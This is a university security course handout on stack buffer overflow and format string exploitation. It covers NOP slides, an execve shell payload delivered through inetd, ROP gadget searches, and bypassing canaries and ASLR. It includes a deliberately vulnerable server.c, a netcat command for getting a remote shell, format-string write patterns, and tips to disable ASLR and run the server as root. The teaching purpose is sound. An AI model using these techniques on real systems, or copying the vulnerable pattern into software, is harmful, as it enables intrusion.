===================
Class 11: Exploit
===================

Date: 13.05.2025


Additional materials
=====================

.. a: - :ref:`08-assignment` -- This got lost somewhere in the repo!

- :download:`exploit-x86_64.tar.bz2`


Program stack
=============

Every process has a stack, provided by the operating system. It is
nothing more than a mapped, continuous segment of the process's address space
and a set stack register (for the purpose of this scenario - SP).
Local variables, return addresses of currently executing functions, and
partial results of calculations are stored on the stack.
The implementation of operations is trivial:

- putting data onto the stack means writing to the memory pointed to by the
  SP register and modifying this register by the size of the written data
- taking data from the stack means reading from under SP and modifying SP by the
  size of the data being taken


The operating system maps a predetermined amount of memory for the stack for
programs (around 2 pages), and allocates subsequent memory pages only when
needed.

i386
----

For the purposes of this scenario, we will focus on x86 architectures:

- SP points to the byte at the top of the stack
- the stack grows downwards, meaning putting data onto the stack decreases SP
- on Linux and BSD, the function caller should (in the classic case, more in [1]):

  - save the contents of registers other than BP, SI, DI, BX (if it will want
    to use them later)
  - put arguments onto the stack in reverse order of function declaration
  - jump to the body of the called function, putting the current location in the
    program code onto the stack (return address)
  - upon return of the called function - remove arguments from the stack (result
    is in AX)

- the called function should:

  - save registers BP, SI, DI, BX if it intends to change them
  - optionally set the BP register to the content of SP (needed to obtain
    stack-traces, simplifies assembler code, but is not mandatory; in
    gcc, generating such code can be disabled with the
    ``-fomit-frame-pointer`` flag)
  - reserve space on the stack for local variables (by shifting SP)
  - execute its body
  - restore registers
  - put the result into AX
  - jump to the address from the top of the stack - the return address, the one
    placed by the caller

x86_64
------

In the x86_64 architecture, function calls look very similar, with the
difference that the first 6 arguments are passed through registers RDI, RSI,
RDX, RCX, R8, R9 (or XMM0-7 for floating-point types, respectively).
If a function has more arguments, they are passed via the stack - just like in
i386.
Of course, all addresses are 8 bytes.

Disadvantages and advantages of the stack
------------------------------------------

As can be seen from this scenario, allocating local variables is very fast,
because it boils down to modifying one register, and as long as local variables
are multiples of the processor's word size, there is no fragmentation problem.
These two features give stack allocation a significant advantage over
heap allocation - malloc needs complex memory management logic and it is
difficult to avoid fragmentation. Nevertheless, the stack is not suitable for
holding variables whose lifespan exceeds a single function call.
Another feature of the stack is the ease of predicting the arrangement of
program data on it and, in the case of a poorly written program, using this
knowledge to take control of the program.

Buffer overflow
===============

This term refers to a situation where, for some reason, the program "forgets"
the actual size of a buffer and exceeds its boundaries, accessing memory
that does not belong to it.
Example::

   char c[5];
   strcpy(c, "12345");

``strcpy()`` copies a string to the buffer passed as the first argument, along
with the terminating null byte, so in this case, 6 characters into a 5-element
buffer.
The language specification usually says nothing about this, but compilers behave
predictably, and it is easy to guess how variables are arranged relative to each
other on the stack (usually sequentially).
Such a situation causes a particular case of buffer overflow - stack buffer
overflow, to be easily exploitable, because by exceeding the buffer boundary
sufficiently, one can overwrite the return address from the function.
If done skillfully, one can take control of the program, because the ret mnemonic
in the attacked program's code will cause a jump to the location written in the
return address.

inetd
-----

``inetd`` is a standard Unix daemon, a so-called superserver. In the
``inetd.conf`` configuration file, programs are assigned to various network
services, e.g.,
proftpd to the ftp service. ``inetd`` listens on the appropriate
ports and upon establishing a connection, it starts the program appropriate for
the service with descriptors 0 and 1 set so that the program sends data over the
network by writing to standard output and reads data by reading from standard
input.
This approach used to be much more popular than it is today,
although this daemon is still common.
A newer version of the daemon is called
``xinetd`` and differs mainly in the configuration method - instead of one
common ``inetd.conf`` file, each service has a separate file in the
``xinetd.d`` directory.

Writing an exploit
-------------------

Exploit - colloquial name for a program that exploits a vulnerability in another
program.
If we are able to track down a situation that allows arbitrary
exceeding of a buffer size, we can overwrite the return address in such a way
that the program does what the attacker wants.
For simplicity, let's assume we are dealing with the following code (``server.c``)::

    int test()
    {
        char buf[128];
        if (scanf("%s", buf) == EOF)
            return 0;
        printf(buf);
        return 1;
    }

    int main()
    {
        while (test()) {
            fflush(stdout);
        }
        return 0;
    }

We assume that this code is run via inetd. Our goal will be to
obtain everything that the user in whose name this program runs can obtain.
A sketch of what we will write:

- we will send code to be executed (the so-called payload)
- in addition to the payload, we will send such data that instead of returning
  from the ``test()`` function, the payload is executed

Problems:

- check how much garbage needs to be inserted before the fake return address in
  the malicious message to hit the right spot on the stack
- find out what to overwrite the return address with to jump to the payload
- write a payload that does something sensible

Finding out where the return address is, having the source code, is easy -
just count, keeping in mind how function calls look on x86.
When there is no code, this can be done by dumping memory (the stack) and from
the end of the stack (it is known, because the SP register is known) look for
4/8-byte aligned numbers that point to the memory area where the program code
is mapped.
A bigger problem is finding out where to jump, because:

- the stack address is assigned by the operating system
- at first glance, it is not clear what is on the stack below the ``main``
  function
- even if, by reading the libc and kernel code, we find out what and how much
  is on the stack below the main function, it will turn out that it is not a
  constant number, because it depends, for example,
  on:

  - the size of arguments passed to the program
  - the environment

Fortunately, a large part of systems always have the stack start address the same
- close to the end of the process's virtual space, so the fluctuations in the
position of this buffer cannot be very large - they depend mainly on the
environment and program arguments.
Hence, the fluctuations in the buffer address can be reasonably estimated -
just run the program with an empty environment in the / directory, without
arguments, and check the address of any local variable.
It is almost certain that the stack below the main function will not be larger.
We thus have one limitation, and as the second, a reasonable limitation on the
environment and arguments should be accepted.
For simplicity, for now, we ignore the fact that in most systems, the stack
address is currently random (within a certain range).
If we thus create such a situation on the stack:

=============================== ====================
Before attack                   After attack
=============================== ====================
?
payload
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
?                               NOP
------------------------------- --------------------
return address                  malicious return address
------------------------------- --------------------
optionally saved registers      garbage
------------------------------- --------------------
buffer                          garbage
=============================== ====================

(NOP corresponds to some operation that does nothing)

it is enough for the malicious return address to point to any NOP instruction.
If there are enough of them, we can thus eliminate the fluctuations in the
buffer address.
This technique, which involves inserting a large number of NOPs into the
buffer, is called a nop-slide, because figuratively speaking, we slide down the
NOPs to the payload.

Technical details
-----------------

Tools:

- ``objdump``: program disassembling compiled programs - will be useful for
  analysis, especially with the ``-d`` flag
- ``ulimit``: program managing user limits - only to ask the kernel to make
  memory dumps (core dump) in case the program crashes - useful in
  debugging (``-c`` flag)
- ``gdb``: debugging with the ability to load a memory dump
- ``gcc``: for compiling programs, including the payload
- ``/proc/self/maps``: this file in Linux shows process memory mappings, which
  allows to see where the stack starts
- ``netcat`` (``nc``): program that will be used to send the exploit over the
  network


Step-by-step implementation
---------------------------

The simplest and most effective payload will be launching a shell,
i.e., executing ``execve``. Since the launched program inherits descriptors,
and the program launched in inetd uses descriptors 0, 1, and 2 for network
communication, calling ``execve`` will achieve an effect similar to a remote
shell.
Since it is not clear where the PLT is located (because it depends on the
compiler and very minor code changes) and even less clear where the libc
library code is mapped, it is better to call syscalls manually - bypassing
the wrappers provided by the standard library.
Details were discussed in the second class.

Knowing how to execute a syscall, one should write a program in assembler
that will execute ``execve`` on ``/bin/sh``.
An example is in the ``payload.s`` file.

The executable code of this program will be our payload.
Using make show-payload, you can see this code in a format suitable for saving
in C.

The ``demo.c`` file shows how to directly transfer control to this code
(``brute_force`` function) and how to overwrite the return address with the
payload address.
The address used there is solely a result of calculating what is on the stack
according to the calling convention given at the beginning.
At this stage, we assume that the payload will be placed in executable memory.
In the following part, we will discuss how to bypass this limitation.
The last thing is to deliver the payload to the program from outside, along with
the malicious return address and the NOP-slide.
The address location in the buffer is a direct result of the demo.c example. The
address itself, however, was experimentally verified by checking the address of
a local variable in the ``main()`` function.
This can be seen in the ``exploit.py`` file. After sending the malicious data,
we need to be able to send commands somehow; this can be done as follows::

    (./exploit.py; cat) |
    ./server

Network attack
---------------

To achieve the same effect over the network (inetd), you need to experiment a
bit with the buffer size (the size of the NOP-slide) and the address to jump to.
Then it is enough to use netcat (nc command) to interact with the remotely
running server, which will later be a shell.
To do this, run::

    nc -c "./exploit.py;socat STDIO OPEN:/dev/tty"  server_address port

If everything goes well, the result will be exploiting the vulnerability of a
20-line program to take control of a remote computer.

Non-executable stack (NX)
-------------------------

One of the mechanisms that is supposed to make these types of attacks more
difficult is marking which memory pages cannot be executed (NX flag).
In particular, the stack normally does not contain program code, so it can be
marked as such.
However, this does not prevent the attack, it only makes it a little more
difficult - we cannot jump directly to the sent payload, but we can use
everything that is already loaded in memory and marked as executable - in
particular, the standard library (directly or via PLT).
On the i386 architecture, one can simply prepare a jump to e.g.,
the ``system()`` function from libc at the return address location and place
arguments a bit further.
Here, the address of the string ``/bin/sh`` or another equally useful string
is needed.
Since the exact stack address is not known, one cannot (directly) provide
this string oneself.
But a moment of searching will show that the necessary string is in the
standard library::

    $ xxd /lib64/libc.so.6|grep -A 1 /bin
    01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f  ity.nan.-c./bin/
    01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552  sh.exit 0.MSGVER

In the case of the x86_64 architecture, it is a bit more complicated because
initial parameters are passed through registers.
But again, using what is already executable in memory, one can search for
instruction sets that load data from the stack into registers.
This technique is known as Return Oriented Programming, because the searched
instruction sets (so-called gadgets) will most often be in the form of::

    pop ...
    ret

In this way, by placing gadget addresses and data alternately on the stack, we
can load the desired data.
Sometimes gadgets can be more complex, but to find the simplest ones, we can
prepare a source file with the sought instructions (``gadgets.s``), compile it,
and then search the process memory using the ``searchmem`` function from the
peda extension to GDB::

    $ objdump -d gadgets.o
    (...)
    0000000000000000 <main>:
       0:   5f                      pop    %rdi
       1:   c3
             retq
       2:   5e                      pop    %rsi
       3:   c3                      retq

    gdb-peda$ searchmem "\x5f\xc3"
    Searching for '_\xc3' in: None ranges
    Found 543 results, display max 256 items:
    server : 0x4007a3 (<__libc_csu_init+99>:    pop    rdi)
    server : 0x6007a3 --> 0x841f0f2e6666c35f
      libc : 0x7ffff7a3edd5 (<iconv+165>:   pop    rdi)
      libc : 0x7ffff7a3ee02 (<iconv+210>: pop    rdi)
    (...)
    gdb-peda$ searchmem "/bin/sh"
    Searching for '/bin/sh' in: None ranges
    Found 1 results, display max 1 items:
    libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh')

An example using this technique is in the ``exploit-rop.py`` file.

Stack protector and address space randomization (ASLR)
-----------------------------------------------------------

GCC has the ``-fstack-protector`` option, which causes gcc, when starting the
execution of each function, to place a "canary" on the stack, which is a
predetermined number that is checked before exiting the function to see if it
has been changed.
However, if there is a bug in the program that allows a memory segment containing
the "canary" to leak, this mechanism becomes useless.
It so happens that the test program ``server.c`` contains such a bug - having
control over the format string for ``printf()``, any memory segment can be printed.
An example is in ``exploit-rop-stack-protector.py``.

Another mechanism that makes attacks more difficult is address space
randomization (ASLR).
Here, in turn, it makes it harder to know the addresses to which one could
conveniently jump.
And again, the existence of a bug allowing a memory segment to be read is enough
to bypass this mechanism - having any address from the process's address space,
one can check what should be there and calculate the remaining addresses based
on that.
An example is in
``exploit-rop-stack-protector-aslr.py``.

Format string
=============

Not only buffer overflow is a dangerous vulnerability.
As seen earlier, giving control over the format string for ``printf()`` greatly
facilitates attacks.
But such a vulnerability in itself can be used to take control of the program.
Firstly, sensitive data (e.g., passwords) may be present in memory, and
secondly, the ``%n`` format allows modifying memory.
Exploiting this is made easier by the fact that field width can additionally
be taken from printf parameters (e.g., ``%*d``), and that the parameter number
to be used can be specified (e.g., ``%4$d``, or ``%*5$d`` - combinations are also
possible: ``%4$*5$d``).
As a result, a primitive for copying data on the stack can be assembled from
this:
- read data by printing a field of appropriate width: ``%*15$d``
- then the number thus "read" can be written using ``%23$n``

If only interesting addresses are on the stack (or can be assembled using the
above), memory can be modified arbitrarily in practice.
An example program for experiments is in ``login.c``. It is a simple tool that
checks a hardcoded password hash and, if it matches, launches a shell.
It is intended to be installed with the SUID bit set.
Additionally, to be more user-friendly, you can provide your own password prompt
text.
The goal of the attack is, of course, to bypass the password. To do this,
one must find the address of the variable responsible for admitting the user on
the stack, and then provide such a parameter as to overwrite this variable.

Moral
=====

The above examples show how dangerous careless programming is. Although this is
an example for the purpose of a course, the mechanism is common, used, and
ubiquitous.
Security reports from internet portals such as Secunia confirm this.

Can we defend against this in any way?
There are many methods; unfortunately, they only make the work of hackers more
difficult but do not prevent it:

- stack randomization (the start of the stack is in a different place in each
  process)
- randomization of the entire address space - including the mapping location
  of libraries and the program loading location
- NX bit (newer processors allow marking a segment of the virtual space (stack)
  as Non-eXecutable, which will cause an error when trying to execute the
  payload)
- gcc has the ``-fstack-protector`` option, which causes gcc, when starting the
  execution of each function, to place a "canary" on the stack, which is a
  predetermined number that is checked before exiting the function to see if it
  has been changed
- gcc and glibc have protection against format string attacks, activated by
  the compilation option ``-D_FORTIFY_SOURCE=2``
- resolving all relocations early and switching the entire GOT and PLT to
  read-only

A quite good way to avoid memory management errors (including buffer overflow)
is to use languages that handle this themselves, such as Java, Python, etc.
Of course, this will not protect against errors in the implementation of such a
compiler/interpreter itself.

Tips
---------

- to disable stack randomization, change kernel settings::

      sysctl -w kernel.randomize_va_space=0

- to add an ftp-like server on port 21 to inetd, add the line::

      ftp     stream  tcp     nowait  root    /root/server

- for the ``xinetd`` version, analogous configuration will require
  ``/etc/xinetd.d/ftp``::

      service ftp
      {
          disable     = no
          id          = ftp
          wait        = yes
          socket_type = stream
          user        = root
          group       = root
          server      = /root/server
          #server_args    =
      }

- when working with gdb, the "peda" extension (Python Exploit Development
  Assistance for GDB) is very useful - https://github.com/longld/peda

- in the payload, be careful with whitespace - ``scanf()`` will stop reading
  the rest of the characters at the first such character

.. Author: Marek Dopiera <dopiera (at) mimuw (dot) edu (dot) pl>
   Update 12.05.2015 Marek Marczykowski-Górecki <marmarek@mimuw.edu.pl>
   Translated by Gemini: 13.05.2025